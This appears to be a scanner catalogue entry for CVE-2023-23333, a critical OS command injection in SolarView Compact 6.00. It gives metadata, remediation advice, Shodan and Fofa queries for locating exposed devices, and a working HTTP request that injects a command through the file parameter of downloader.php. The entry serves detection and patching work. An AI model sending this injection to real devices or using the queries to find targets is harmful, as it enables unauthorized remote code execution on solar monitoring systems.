| Title | SolarView Compact 6.00 - OS Command Injection |
|---|---|
| Author | Mr-xn |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94216 |
| CVE ID | CVE-2023-23333 |
| CWE ID | CWE-77 |
| Shodan Query | http.html:"SolarView Compact"http.favicon.hash:"-244067125"http.html:"solarview compact"cpe:"cpe:2.3:o:contec:solarview_compact_firmware" |
| Fofa Query | body="SolarView Compact" && title="Top"body="solarview compact" && title="top"icon_hash="-244067125"body="solarview compact" |
| Tags | cve cve2023 packetstorm solarview rce contec vkev vuln |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23333.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-23333.pcap
N/AN/A